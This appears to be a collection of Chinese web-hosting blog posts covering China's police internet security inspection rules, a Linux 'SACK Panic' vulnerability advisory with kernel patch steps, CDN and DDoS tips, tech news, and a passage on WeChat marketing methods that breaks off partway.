为规范公安机关互联网安全监督检查工作,预防网络违法犯罪,维护网络安全,保护公民、法人和其他组织合法权益,根据《中华人民共和国人民警察法》《中华人民共和国网络安全法》等有关法律、行政法规,制定本规定。 第二条 本规定适用于公安机关依法对互联网服务提供者和联网使用单位履行法律、行政法规规定的网络安全义务情况进行的安全监督检查。 第三条 互联网安全监督检查工作由县级以上地方人民政府公安机关网络安全保卫部门组织实施。 上级公安机关应当对下级公安机关开展互联网安全监督检查工作情况进行指导和监督。 第四条 公安机关开展互联网安全监督检查,应当遵循依法科学管理、保障和促进发展的方针,严格遵守法定权限和程序,不断改进执法方式,全面落实执法责任。 第五条 公安机关及其工作人员对履行互联网安全监督检查职责中知悉的个人信息、隐私、商业秘密和国家秘密,应当严格保密,不得泄露、出售或者非法向他人提供。 公安机关及其工作人员在履行互联网安全监督检查职责中获取的信息,只能用于维护网络安全的需要,不得用于其他用途。 第六条 公安机关对互联网安全监督检查工作中发现的可能危害国家安全、公共安全、社会秩序的网络安全风险,应当及时通报有关主管部门和单位。 第七条 公安机关应当建立并落实互联网安全监督检查工作制度,自觉接受检查对象和人民群众的监督。 第二章 监督检查对象和内容 第八条 互联网安全监督检查由互联网服务提供者的网络服务运营机构和联网使用单位的网络管理机构所在地公安机关实施。互联网服务提供者为个人的,可以由其经常居住地公安机关实施。 第九条 公安机关应当根据网络安全防范需要和网络安全风险隐患的具体情况,对下列互联网服务提供者和联网使用单位开展监督检查: (一)提供互联网接入、互联网数据中心、内容分发、域名服务的; (二)提供互联网信息服务的; (三)提供公共上网服务的; (四)提供其他互联网服务的; 对开展前款规定的服务未满一年的,两年内曾发生过网络安全事件、违法犯罪案件的,或者因未履行法定网络安全义务被公安机关予以行政处罚的,应当开展重点监督检查。 第十条 公安机关应当根据互联网服务提供者和联网使用单位履行法定网络安全义务的实际情况,依照国家有关规定和标准,对下列内容进行监督检查: (一)是否办理联网单位备案手续,并报送接入单位和用户基本信息及其变更情况; (二)是否制定并落实网络安全管理制度和操作规程,确定网络安全负责人; (三)是否依法采取记录并留存用户注册信息和上网日志信息的技术措施; (四)是否采取防范计算机病毒和网络攻击、网络侵入等技术措施; (五)是否在公共信息服务中对法律、行政法规禁止发布或者传输的信息依法采取相关防范措施; (六)是否按照法律规定的要求为公安机关依法维护国家安全、防范调查恐怖活动、侦查犯罪提供技术支持和协助; (七)是否履行法律、行政法规规定的网络安全等级保护等义务。 第十一条 除本规定第十条所列内容外,公安机关还应当根据提供互联网服务的类型,对下列内容进行监督检查: (一)对提供互联网接入服务的,监督检查是否记录并留存网络地址及分配使用情况; (二)对提供互联网数据中心服务的,监督检查是否记录所提供的主机托管、主机租用和虚拟空间租用的用户信息; (三)对提供互联网域名服务的,监督检查是否记录网络域名申请、变动信息,是否对违法域名依法采取处置措施; (四)对提供互联网信息服务的,监督检查是否依法采取用户发布信息管理措施,是否对已发布或者传输的法律、行政法规禁止发布或者传输的信息依法采取处置措施,并保存相关记录; (五)对提供互联网内容分发服务的,监督检查是否记录内容分发网络与内容源网络链接对应情况; (六)对提供互联网公共上网服务的,监督检查是否采取符合国家标准的网络与信息安全保护技术措施。 第十二条 在国家重大网络安全保卫任务期间,对与国家重大网络安全保卫任务相关的互联网服务提供者和联网使用单位,公安机关可以对下列内容开展专项安全监督检查: (一)是否制定重大网络安全保卫任务所要求的工作方案、明确网络安全责任分工并确定网络安全管理人员; (二)是否组织开展网络安全风险评估,并采取相应风险管控措施堵塞网络安全漏洞隐患; (三)是否制定网络安全应急处置预案并组织开展应急演练,应急处置相关设施是否完备有效; (四)是否依法采取重大网络安全保卫任务所需要的其他网络安全防范措施; (五)是否按照要求向公安机关报告网络安全防范措施及落实情况。 对防范恐怖袭击的重点目标的互联网安全监督检查,按照前款规定的内容执行。 第三章 监督检查程序 第十三条 公安机关开展互联网安全监督检查,可以采取现场监督检查或者远程检测的方式进行。 第十四条 公安机关开展互联网安全现场监督检查时,人民警察不得少于二人,并应当出示人民警察证和县级以上地方人民政府公安机关出具的监督检查通知书。 第十五条 公安机关开展互联网安全现场监督检查可以根据需要采取以下措施: (一)进入营业场所、机房、工作场所; (二)要求监督检查对象的负责人或者网络安全管理人员对监督检查事项作出说明; (三)查阅、复制与互联网安全监督检查事项相关的信息; (四)查看网络与信息安全保护技术措施运行情况。 第十六条 公安机关对互联网服务提供者和联网使用单位是否存在网络安全漏洞,可以开展远程检测。 公安机关开展远程检测,应当事先告知监督检查对象检查时间、检查范围等事项或者公开相关检查事项,不得干扰、破坏监督检查对象网络的正常运行。 第十七条 公安机关开展现场监督检查或者远程检测,可以委托具有相应技术能力的网络安全服务机构提供技术支持。 网络安全服务机构及其工作人员对工作中知悉的个人信息、隐私、商业秘密和国家秘密,应当严格保密,不得泄露、出售或者非法向他人提供。公安机关应当严格监督网络安全服务机构落实网络安全管理与保密责任。 第十八条 公安机关开展现场监督检查,应当制作监督检查记录,并由开展监督检查的人民警察和监督检查对象的负责人或者网络安全管理人员签名。监督检查对象负责人或者网络安全管理人员对监督检查记录有异议的,应当允许其作出说明;拒绝签名的,人民警察应当在监督检查记录中注明。 公安机关开展远程检测,应当制作监督检查记录,并由二名以上开展监督检查的人民警察在监督检查记录上签名。 委托网络安全服务机构提供技术支持的,技术支持人员应当一并在监督检查记录上签名。 第十九条 公安机关在互联网安全监督检查中,发现互联网服务提供者和联网使用单位存在网络安全风险隐患,应当督促指导其采取措施消除风险隐患,并在监督检查记录上注明;发现有违法行为,但情节轻微或者未造成后果的,应当责令其限期整改。 监督检查对象在整改期限届满前认为已经整改完毕的,可以向公安机关书面提出提前复查申请。 公安机关应当自整改期限届满或者收到监督检查对象提前复查申请之日起三个工作日内,对整改情况进行复查,并在复查结束后三个工作日内反馈复查结果。 第二十条 监督检查过程中收集的资料、制作的各类文书等材料,应当按照规定立卷存档。 第四章 法律责任 第二十一条 公安机关在互联网安全监督检查中,发现互联网服务提供者和联网使用单位有下列违法行为的,依法予以行政处罚: (一)未制定并落实网络安全管理制度和操作规程,未确定网络安全负责人的,依照《中华人民共和国网络安全法》第五十九条第一款的规定予以处罚; (二)未采取防范计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施的,依照《中华人民共和国网络安全法》第五十九条第一款的规定予以处罚; (三)未采取记录并留存用户注册信息和上网日志信息措施的,依照《中华人民共和国网络安全法》第五十九条第一款的规定予以处罚; (四)在提供互联网信息发布、即时通讯等服务中,未要求用户提供真实身份信息,或者对不提供真实身份信息的用户提供相关服务的,依照《中华人民共和国网络安全法》第六十一条的规定予以处罚; (五)在公共信息服务中对法律、行政法规禁止发布或者传输的信息未依法或者不按照公安机关的要求采取停止传输、消除等处置措施、保存有关记录的,依照《中华人民共和国网络安全法》第六十八条或者第六十九条第一项的规定予以处罚; (六)拒不为公安机关依法维护国家安全和侦查犯罪的活动提供技术支持和协助的,依照《中华人民共和国网络安全法》第六十九条第三项的规定予以处罚。 有前款第四至六项行为违反《中华人民共和国反恐怖主义法》规定的,依照《中华人民共和国反恐怖主义法》第八十四条或者第八十六条第一款的规定予以处罚。 第二十二条 公安机关在互联网安全监督检查中,发现互联网服务提供者和联网使用单位,窃取或者以其他非法方式获取、非法出售或者非法向他人提供个人信息,尚不构成犯罪的,依照《中华人民共和国网络安全法》第六十四条第二款的规定予以处罚。 第二十三条 公安机关在互联网安全监督检查中,发现互联网服务提供者和联网使用单位在提供的互联网服务中设置恶意程序的,依照《中华人民共和国网络安全法》第六十条第一项的规定予以处罚。 第二十四条 互联网服务提供者和联网使用单位拒绝、阻碍公安机关实施互联网安全监督检查的,依照《中华人民共和国网络安全法》第六十九条第二项的规定予以处罚;拒不配合反恐怖主义工作的,依照《中华人民共和国反恐怖主义法》第九十一条或者第九十二条的规定予以处罚。 第二十五条 受公安机关委托提供技术支持的网络安全服务机构及其工作人员,从事非法侵入监督检查对象网络、干扰监督检查对象网络正常功能、窃取网络数据等危害网络安全的活动的,依照《中华人民共和国网络安全法》第六十三条的规定予以处罚;窃取或者以其他非法方式获取、非法出售或者非法向他人提供在工作中获悉的个人信息的,依照《中华人民共和国网络安全法》第六十四条第二款的规定予以处罚,构成犯罪的,依法追究刑事责任。 前款规定的机构及人员侵犯监督检查对象的商业秘密,构成犯罪的,依法追究刑事责任。 第二十六条 公安机关及其工作人员在互联网安全监督检查工作中,玩忽职守、滥用职权、徇私舞弊的,对直接负责的主管人员和其他直接责任人员依法予以处分;构成犯罪的,依法追究刑事责任。 第二十七条 互联网服务提供者和联网使用单位违反本规定,构成违反治安管理行为的,依法予以治安管理处罚;构成犯罪的,依法追究刑事责任。 第五章 附则 第二十八条 对互联网上网服务营业场所的监督检查,按照《互联网上网服务营业场所管理条例》的有关规定执行。 第二十九条 本规定自2018年11月1日起施行。 #### 关于LinuxTCP"SACKPANIC"远程拒绝服务漏洞的通知 近日Linux 内核被曝存在TCP “SACK PANIC” 远程拒绝服务漏洞(漏洞编号:CVE-2019-11477,CVE-2019-11478,CVE-2019-11479),攻击者可利用该漏洞远程攻击目标服务器,导致系统崩溃或无法提供服务。 为避免您的业务受影响,景安国际有限公司建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 【漏洞详情】 近日发现 Linux 以及 FreeBSD 等系统内核上存在严重远程DoS漏洞,攻击者可利用该漏洞构造并发送特定的 SACK 序列请求到目标服务器导致服务器崩溃或拒绝服务。 【风险等级】 高风险 【漏洞风险】 远程发送特殊构造的攻击包,导致目标 Linux 或 FreeBSD 服务器崩溃或服务不可用。 【影响版本】 目前已知受影响版本如下: FreeBSD 12(使用到 RACK TCP 协议栈) CentOS 5(Redhat 官方已停止支持,不再提供补丁) CentOS 6 CentOS 7 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 19.04 Ubuntu 18.10 【安全版本】 各大Linux发行厂商已发布内核修复补丁,详细内核修复版本如下: CentOS 6 :2.6.32-754.15.3 CentOS 7 :3.10.0-957.21.3 Ubuntu 18.04 LTS:4.15.0-52.56 Ubuntu 16.04 LTS:4.4.0-151.178 【修复建议】 请参照上述【安全版本】升级您的 Linux 服务器内核,参考操作如下: 推荐方案:【CentOS 6/7 系列用户】 1)yum clean all && yum makecache,进行软件源更新; 2)yum update kernel  -y,更新当前内核版本; 3)reboot,更新后重启系统生效; 4)uname -a,检查当前版本是否为上述【安全版本】,如果是,则说明修复成功。 推荐方案:【Ubuntu 16.04/18.04 LTS 系列用户】 1)sudo apt-get update && sudo apt-get install linux-image-generic,进行软件源更新并安装最新内核版本; 2)sudo reboot,更新后重启系统生效; 3)uname -a,检查当前版本是否为【安全版本】,如果是,则说明修复成功。 临时缓解方案:如用户不方便重启进行内核补丁更新,可选择如下方式禁用内核SACK配置防范漏洞利用,运行如下命令即可: 1)echo 'net.ipv4.tcp_sack = 0' >> /etc/sysctl.conf ,禁用 SACK 配置; 2)sysctl -p ,重载配置,使其生效。 【漏洞参考】 1)官方通告:https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md 2)社区参考:https://www.openwall.com/lists/oss-security/2019/06/17/5 3)红帽公告:https://access.redhat.com/security/vulnerabilities/tcpsack #### 关于使用CDN后影响SEO的一些小技巧 CDN刚出来的时候很高端,价格贵,一般只有大型网站用得起,不过经过这几年的国内各大互联网公司的竞争,CDN价格已经降到极致,很多中小网站都用得上。虽然CDN对网站加速有不错的效果,不过CDN对SEO影响也是有的,如果设置不好甚至会让你网站收录爆减,今天主机吧教大家一些关于使用CDN后SEO小技巧。 我们都知道CDN是由多个边缘节点加速网站的,而这些加速节点往往都是一个IP下运行几十上百甚至几百个网站,懂SEO的都知道同IP下的网站会影响搜索引擎对网站的评价,所以如果搜索引擎蜘蛛抓取的IP是你CDN的节点,那么影响会非常不好,而且有些CDN节点也不怎么稳定,还有些CDN是限制了蜘蛛抓取,各种因素告诉我们,一定不能让蜘蛛抓取CDN的节点。 因此,国内各大CDN服务商考虑到这因素都是会出一个搜索引擎蜘蛛访问回源,比如百度云加速就有 搜索引擎自动回源功能。 不管用哪家CDN,为了保证收录效果,大家记录一定要开启搜索引擎回源功能。还有在CDN里设置抓取回源还不够,为了保证一定能回源,我们需要直接在域名解析里,专门为搜索引擎做A记录回源服务器。现在几乎哪家域名解析线路都有针对搜索引擎的解析,比如主机吧用的阿里云的解析就有百度线路的解析,我们可以按以上操作解析记录值至服务器IP,完成回源解析。 设置成功后,等半小时生效,我们进入百度站长平台,抓取诊断看下是否抓取成功。 显示百度蜘蛛抓取的源服务器IP表示生效。好了以上就是主机吧对使用CDN后SEO的一些小技巧,希望可以帮到大家,如果有疑问可以留言主机吧。 #### 关于使用阿里云服务器和百度云加速cname解析时出现报错520情况解决方案汇总 关于使用阿里云服务器和百度云加速cname解析时出现报错520情况的解决方案汇总 阿里云服务器基本上是不会拦截百度云加速的节点的。 排查方法: 主机吧方法:https://zhujib.com/aliyunfuwuqixiezaiguandiaoyundunanqishi.html?tdsourcetag=s_pctim_aiomsg 如果你用的是宝塔面板,那么宝塔面板里的防火墙加上百度云节点,然后重启服务器,如图 添加的IP段在百度云官网是有的,附上地址:https://su.baidu.com/helps/index.html#/0/5a4ca79bb34f69327c4b9dc3?tdsourcetag=s_pctim_aiomsg&qq-pf-to=pcqq.c2c 重启完服务器,如果可以正常访问,就不需要其他的操作了,如果不行的话,继续操作下一步,如果上面的方法都不行,那你肯定是买了阿里云的安骑士或者云安全中心了,进入安骑士或者云安全中心的控制中心,找到设置-安全设置-Agent插件,可以看到有个管理,点击管理,把你的服务器改成业务优先模式,如图。 好了,现在重启服务器,大概等待10分钟。就可以了。 笔者是折腾了几小时,找遍了各种方法搞定的。 感谢来自:蛋白云 的分享 #### 关于景安香港虚拟主机遭受大流量DDOS攻击 无法访问的公告 前两天使用景安香港虚拟主机的客户都向主机吧反馈无法访问,主机吧也第一时间向景安了解到,原来是景安所属的新世界电讯机房遭受大量DDOS攻击,导致部分业务无法访问,后经过一天的处理终于处理了。以下景安的回答: 尊敬的用户:     您好! 由于香港机房遭受大流量DDOS攻击,导致部分香港业务无法访问,我司目前已将业务迁移至其他正常IP段进行紧急恢复,目前网站访问基本已全部恢复。 目前我司仍在与香港机房进行沟通协调中,恢复受影响的IP,为防止此类事件再次发生,我司也正与香港机房沟通,加强抗攻击能力。 从这件事我们可以了解到香港机房抗攻击能力是很差的,平时没发觉什么,一但基本都会瘫痪。所以主机吧推荐大家尽量使用国内机房,抗攻击能力强或使用百度云加速进行隐藏原站IP并加速。 #### 关于百度云加速2秒浏览器检查页面说明 关于2秒浏览器检查: 该功能是拦截CC攻击的有效防护措施,2秒是系统在对当前访问的请求进行检测。 如果您需要关闭2秒浏览器检查,请登录云加速后台进入安全配置中,将CC防护调整到非强力防护级别即可。 但如果您的网站正处在被攻击状态,请视攻击规模将CC防护调整到强力防护模式,如防护默认为中,在网站受到攻击时,系统也会自动调度。而在攻击状态下,如果您手动将防护级别降低,可能导致部分流量经过节点访问到服务器上,导致服务器并发过高,影响正常用户访问。 #### 关于百度云加速CDN缓存命中率低问题原因解析 最近有客户向主机吧反馈说百度云加速CDN命中率低,访问流量大多都回源了。 经过查看后我们发现是客户设置问题,这里我们给大家说下哪些设置影响到CDN的缓存命中率。   1 动态网站加速 动态网站也就是那些以.PHP、ASP、NET为后缀的网站,这类后缀地址云加速是不会默认缓存的,只做优化链路处理,所以每次请求这个地址都是会回源源服务器的。为什么云加速不缓存这类动态文件呢,因为这像这类文件如果缓存的话会出问题的,比如会员注册、评论、登陆这些要刷新缓存的操作会受影响。 如果你的网站并没有会员登陆这些功能,只是纯展示页面,那么你可以进行自定义规则,把动态后缀设置全缓存,这样命中率就上来了。   2 文件类型并不在默认缓存行列中 以下后缀文件在符合相应的cache-control的情况下会被缓存 css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/ midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 如以上后缀的文件并不在你的文件行列中,比如.AVI、psf这类文件,请自行做规则自定义,你可以通过规则自定义来实现,点击“查看报表”旁边的下拉菜单,点击“规则自定义”,在规则自定义页面可通过规则来设置需要缓存的页面,目录及文件类型。 3 缓存粒度设置错误  缓存粒度设置功能在 加速功能-CDN-缓存粒度设置里设置,很多站长设置成基础或简单,这两个设置会降低缓存命中率的,因为有些客户的图片地址后面是带参数的,如果设置为基础,云加速会不缓存带参数的静态文件。 需要注意的是:以上缓存均必须是在百度云加速默认缓存的后缀中,如果不在默认认缓存文件中的,请自行自定义缓存规则,通过规则自定义来实现,点击“查看报表”旁边的下拉菜单,点击“规则自定义”,在规则自定义页面可通过规则来设置需要缓存的页面,目录及文件类型。   好了,以上就是百度云加速CDN命中率低的一些原因与解决办法,希望可以帮到大家。 #### 关于百度云加速和cloudflare的关系 百度云加速和cloudflare是合作关系估计各位站长都懂,但是具体都多深度合作?很多人不知道,今天主机吧来给大家介绍下百度云加速和cloudflare的关系。 用过百度云加速和cloudflare的朋友一定会发现,百度云加速的功能和cloudflare极度相似的,甚至可以说百度云加速是cloudflare的简化版,事实上也是,百度和cloudflare是一套系统的,除了界面不一样而以,功能是一样的,百度云加速的功能是拿着cloudflare的接口开发的,所以cloudflare的功能要比百度云加速多得多,但cloudflare的核心功能百度云加速都有。 主机吧经常帮客户反馈过问题至百度企业QQ,发现百度云加速解决不了问题都会反馈至cloudflare美国,从这里我们可以得出,百度云加速其实就是cloudflare的国内马甲。 官方介绍:https://www.cloudflare.com/zh-cn/network/china/ 那么为什么cloudflare不直接进入中国而选择跟百度合作呢? 这就涉及到我国电信许可证了,但凡做有关电信的行业,都是需要申请ISP经营许可证的,而国内对外资电信是有控制的,纯外资企业是没办法申请ISP经营许可证的,目前已知的外企中,也就只有英国的BT电信才拿到许可证,而这个许可还是两国谈了很久的,可想而知进入我们电信业是有多难。 所以很多外国公司进入中国都是要么以合作方式,要么以合资企业成立新公司,那样才算进入中国,比如谷歌云前段时间就是与腾讯云合作的。 那么cloudflare的跟百度云加速的关系就理清了,合作方式进入中国,技术还是cloudflare的。 #### 关于百度云加速套餐服务内容调整的通知 尊敬的云加速用户,您好! 近期云加速对底层系统和线路进行了升级改造,以提高整体的运行效率,为用户提供更高质量的服务: - 加速功能:节点系统升级,用户使用效率提升; - 安全服务:安全能力升级,安全检测和防护能力均得到提升;业务访问体验进一步优化 - 产品升级:新增高防套餐和高防包;高防套餐加量不加价,使用成本更低。 详细的套餐服务内容请点击右侧链接查看:https://su.baidu.com/plan.html#compare 感谢您对云加速的信任与支持。 百度云加速 2021年9月18日 #### 关于百度云加速开启强力防护网站微信打不开/不跳转问题 最近有客户遇到网站开启强力防护后,微信显示5秒盾后不跳转页面的问题。 主机吧也帮联系了百度云加速官方技术请求解决,结果挺失望的。 百度官方给的回复是:这个不好解决哦,因为强力防护是一个js验证的过程,微信端可能不支持用cookie导致的跳转不成功。 所以大家只在受强力攻击的情况下开启强力防护哈,平台开启的话可能会损失部份正常流量的。 #### 关于百度云加速的SEO效果 最近遇一位客户,想购买百度云加速,但是购买原因是看重百度云加速的SEO效果。从那客户反馈来看百度云加速对百度索引是非常有效果的。 但是这位客户还想要关键词排名,而且明确如果没有效果要申请退款,所以这边拒绝了这位客户的购买意向。 今天主机吧就来讲下关于百度云加速的SEO效果问题。 首先新站接入百度云加速后,确实有增加百度蜘蛛索引的功效,百度云加速为网站提供了投递黑名单、新站百度报到、更新通知、改版通知等SEO功能。 其中新站百度报到功能是对新站特别友好的,某些新建的网站,想要快速让百度索引,并收录,这个功能是非常有效果的。 百度云加速还提供网页投递功能,可以自动把网页链接投递到百度搜索引擎上。 需要说明的是这里只是把你网页投递给百度索引,让百度更快的发现你的网页,至于百度最终会不会收录你的网站,这个要综合多种因素,百度并不会100%收录你的网页。 而且这个并不会涉及排名,百度排名是综合网站内容质量、速度、稳定性,还有权威性等因素决定排名的,百度云加速是可以增加网站访问速度,只是其中的一个因素,其它因素还是要靠自身网站内容来决定的,所以想要只靠百度云加速来实现网站关键词排名,那是不现实的,这也是为何这边拒绝那位客户的原因。 SEO是一件持之以恒的事情,想要快速得到排名那就得在网站各方面下苦功,而不是想靠某个产品快速提升上去,以前确实有人利用软件点击排名,达到快速增加排名的目的,不过这个是属于作弊行为,已经被百度禁止的,百度也针对这类操作出了相关规则,一但被查到网站可能会被拉黑,消失在百度上,所以如果你想长久做网站的,千万别相信那些快排服务。 好了,今天就说到这里了,有需要百度云加速的可以联系主机吧购买。 #### 关掉网站日志让服务器更抗CC攻击 虽然网站开启访问日志功能可以很清楚的查看网站访问者的IP,攻击路径等信息,但是很多时候即使你知道对方攻击你哪个链接,你也没办法防御。 而且相对于一些CC攻击来说,都是通过非法请求大量不存在的链接来导致网站服务器CPU内存占满,即使我们通过日志知道对方IP也是没用,因为对方都是用代理IP,而代理IP随时可以换,完全禁不来。 开启网站日志功能反而成了鸡肋,主机吧今天就遭受了大量CC攻击,导致CPU满100%,服务器生成日志文件短短一个小时高达1G多,日志功能严重占用下行宽大与CPU资源。 从上图我们可以到大量的CC攻击导致百度CDN节点大量请求我的网站,生成了高达1.43G的日志文件,也就是日志文件起码每秒写入2M以上数据。我想一般大家用的服务器下行速度都没多少M吧,单写日志就用了2M了,那还搞啥。 所以主机吧在宝塔面板果断关了写访问日志功能 关了后效果马上就起来了,CPU降了,下行宽带也降了。 如果你也有遇到CC攻击,不防把网站日志关了试试,可以得到不错的效果哦。 #### 关注隐私的搜索引擎DuckDuckGo日搜索量首次超过1亿次 1月18日 消息:关注隐私的小众搜索引擎DuckDuckGo在迎来了其上线12年历史上的一个重要里程碑。今天,这款搜索引擎的用户搜索查询量首次突破1亿次。 这一成就是在该公司经历了过去两年的持续增长之后取得的,特别是自2020年8月以来,该搜索引擎开始每月搜索查询次超过20亿次。与谷歌每天50亿次的搜索查询相比,这个数字很小,但这是一个积极的信号,表明用户正在寻找替代品。 DuckDuckGo除了有网页版,目前还提供Android和iOS的移动应用程序以及专门的Chrome扩展。 该公司在2020年9月的一条推文中表示,超过400万用户安装了这些应用程序和扩展程序。 但是这个搜索引擎的越来越受欢迎最主要的是它不收集用户数据,并向所有用户提供相同的搜索结果。 这种尊重隐私的做法也帮助该公司在赢得了一批关注隐私的追随者。DuckDuckGo被选为Tor浏览器的默认搜索引擎,在其他几个浏览器的私人浏览模式中,通常是默认的搜索引擎。 值得一提的是,就在DuckDuckGo的历史性里程碑到来的一周,另外两个以隐私为中心的应用程序Signal和Telegram也宣布了主要的增长时期。 Telegram周一宣布其注册用户达到5亿,而Signal在突然涌入“数百万新用户”后,服务器在上周五宕机,该公司表示,这甚至超出了其最乐观的预期。 #### 养乐多公司遭黑客入侵,95.19 GB 数据泄漏涉及合同及员工敏感数据等 事件概述 根据最新的消息,养乐多公司在2023年12月15日遭到黑客团队DragonForce的入侵,黑客瘫痪了养乐多澳大利亚与新西兰分公司的IT系统,并泄露了公司内部95.19GB的数据。这些数据包括公司的数据库、合同以及员工护照等隐私内容。 影响 养乐多公司正在与多家安全部门进行合作,他们声称未来将提供“进一步的信息”。然而,由于黑客团队DragonForce在12月20日于暗网上公布了养乐多公司的部分隐私数据,并要求养乐多公司支付“适当的赎金”,否则就将公布所有数据信息。 黑客团队 据了解,DragonForce是一个新兴的黑客团队,他们自称“已经对20家公司进行了攻击”,并放出了部分受害公司的内部商业文件。然而,目前外界对该黑客团队所知甚少。 总结 养乐多公司的数据泄露事件再次提醒我们,企业必须加强网络安全防护,防止此类事件的发生。同时,对于个人来说,也应该提高网络安全意识,保护好自己的个人信息。 #### 内蒙古网站用户注销备案申请表.doc 注销备案申请表 填表须知: 本申请表仅用于遗忘密码的备案用户注销备案,若有密码请通过接入服务商企业侧系统自行提交注销申请。 申请表用于存档,请使用A4打印纸,纸张不符或未准确清晰完整填写者,视为无效申请。 个人网站用户注销备案必须提供申请表、域名证书、个人身份证复印件。 企事业、社会团体、政府网站用户必须提供盖有公章的申请表、营业执照(组织机构代码证)复印件。 申请书以及相关材料请传真至我局。传真号码为0471-6684179。 请传真后拨打0471-6680579确认提交材料是否收到并完整清晰、符合要求。 我局工作人员将自收到申请后5个工作日内通过邮件或电话方式答复。   #### 内蒙古设立虚拟币「挖矿」企业举报平台 5月19日消息:据内蒙古自治区发展和改革委员会网站发布的公告显示,为认真贯彻落实《关于确保完成“十四五”能耗双控目标任务若干保障措施》关于全面清理关停虚拟货币“挖矿”项目的工作要求,进一步拓宽虚拟货币“挖矿”企业问题情况来源渠道,充分发挥群众监督保障作用,特设立虚拟货币“挖矿”企业举报平台,敬请广大群监督举报。 具体来看,举报主要范围有四项: 1、虚拟货币“挖矿”企业; 2、伪装成数据中心享受税收、土地、电价等方面优惠政策的虚拟货币“挖矿”企业; 3、为从事虚拟货币“挖矿”企业提供场地租赁等服务的企业; 4、通过非法手段获取电力供应,从事虚拟货币“挖矿”业务的企业。 据了解,虚拟货币挖矿的最重要成本即为电费,火电资源丰富的内蒙古一直是国内大型矿场基地之一。随着比特币价格的暴涨,挖矿正在消耗庞大电力。 2017 年初,比特币挖矿的年耗电量为6. 6 太瓦时;到了 2018 年,就增长了 7 倍左右,为48. 37 太瓦时; 2020 年 10 月,耗电量上升至 67 太瓦时。 2020 年 3 月这个数字又增加了一倍至129. 22 太瓦时。 #### 再见了!运营27年PC硬件站AnandTech宣布停更 8月31日消息,PC硬件站AnandTech突然说再见。 AnandTech成立于1997年,一直致力于报道 PC 硬件行业,提供处理器、主板、显卡等产品的详细评测等, 由一个15岁的少年(Anand Lal Shimpi)在自己的卧室创办了AnandTech,由于带来了不少大量的专业内容,其也是受到了很多玩家的追捧。 不过,Shimpi于2014年离开自己创办的网站,前往苹果公司担任硬件工作,现任主编Ryan Smith接替了他的工作,而对于网站的关闭,其没有具体说明原因,只是表示:基于文字的科技新闻的市场已今非昔比,以后也不会再有。 归根结底,一个网站的影响力取决于它的读者,否则我们就会在互联网的虚空中尖叫。作为作者,我们所能获得的所有荣誉,与那些喜欢我们的内容、引用我们的内容并与世界分享我们的内容的读者相比,都显得微不足道。因此,我从心底感谢你们在过去27年来一直与我们同行。” 不过虽然说再见,但AnandTech网站将继续保留,人们可以阅读过去27年来的大量评论、专题和新闻档案。AnandTech论坛也将继续开放并接受管理。 #### 净网2021专项行动:公安部共抓获1400余名网络水军 10月14日 消息:今日,公安部公布了“净网2021”专项行动最新进展称,今年以来,公安部持续深化网络违法犯罪打击、网络生态治理和秩序整治,共侦破案件3.7万余起,抓获犯罪嫌疑人8万余名,行政处罚违法互联网企业、单位2万余家,取得阶段性显著成效。 在严打“侵犯公民个人信息”行动中,深入开展公民个人信息和数据安全执法大检查,全链条打击非法采集、提供、倒卖个人信息违法犯罪,侦破案件3900余起,抓获犯罪嫌疑人4600余名、行业“内鬼”500余名,全力维护公民个人信息安全和合法权益。 在打击电信网络诈骗和网络赌博犯罪“断源”行动中,加强对资金结算、技术开发、物料供应、引流推广等关键产业治理,侦破为电信网络诈骗和赌博提供网络支撑犯罪的案件1.66万起,抓获犯罪嫌疑人4.9万名。 在打击“网络水军”行动中,持续对利用自媒体等实施敲诈勒索违法犯罪活动进行重点打击,侦破案件190余起,抓获涉案人员1400余名,依法关停非法网站950余个。 在“护苗”行动中,严厉打击涉青少年网络淫秽色情等违法犯罪活动,加强对青少年“自杀”“自残”等行为动向预警干预,配合教育部门及时开展预防、劝阻和疏导工作,侦破危害青少年案件60余起,查处犯罪嫌疑人300余名,打掉涉未成年人淫秽色情网站16个,摧毁制作贩卖未成年人淫秽物品团伙4个,挽救未成年人120余名,挽救企图自杀的青少年390余人次。 在严打网络黑客犯罪行动中,深挖制售木马程序、勒索病毒以及DDos攻击等犯罪,侦破案件900余起,抓获犯罪嫌疑人2100余名。 在严打网络涉考犯罪行动中,坚持以“零容忍”态度全力维护各类考试安全秩序,侦破案件70余起,抓获犯罪嫌疑人450余名,收缴用于考试作弊的窃听窃照器材1600余套。 此外,公安部在网络黑灰产“四治”行动中,聚焦“支付结算”“广告推广”“建站设施”“技术支持”这四类为网络犯罪提供支撑的关键产业,摧毁非法第四方支付平台250余个,打掉洗钱、跑分团伙490余个,非法APP推广团伙370余个,非法建站团伙80余个,非法APP签名团伙11个以及其它技术支撑团伙230余个。在网络治理“四管”行动中,围绕为网络犯罪提供场所的平台,组织查处违法违规即时通信工具60个、违法APP封装或分发平台30余个,办理涉动态IP代理服务案件80余起,关停非法宽带帐号5千余个。 #### 几个微信引流的方法介绍 最近有两位朋友问我怎样快速通过微信引流,因为之前的文章看了后似懂非懂。OK,本篇就来着重讲解一下适合小白操作,同时简单高效的引流方法。 圈内谈到微信引流裂变,无外乎就那么几点。 1、脚本引流 利用自动化脚本,在贴吧、陌陌、头条等等地方,批量点赞、打招呼、推硬广,从而让你的微信号得到大量曝光,达到引流目的。多号操作每天流量十分可观。但问题是你需要准备大量各种账号,还要与各平台严苛的反广告规则周旋,看似光鲜实则苦逼。没有网赚基础的人操作极其困难。 2、群控加人 这个大家也应该有所耳闻,买一套群控软件+几十部手机配合流量卡,批量操作wx号摇一摇、站街、和附近人打招呼。如果用最新的虚拟机或云设备,能省去硬件花销。但总体来说成本还是很高,一个不小心被wx抓住,也是一锅端前功尽弃。完全不适合新人入场。 3、软文引流 写软文,到各大平台去发,文中夹带微信号引流。很多人写作水平一般,写不出足够软、足够攻心的文案,遇到老油条管理员一眼就能认出你是广告。而且小白也不懂各种seo技术,所以听起来简单,其实操作门槛并不低。 4、短信推送 需要搞到大量手机号(买卖用户信息是违法行为!),需要烧钱群发短信(1万条300元左右,平均加人几十个的样子)。这种需要信息渠道、需要资金支撑的灰色引流方法,也并不是人人都能操作的。 5、海报活码裂变 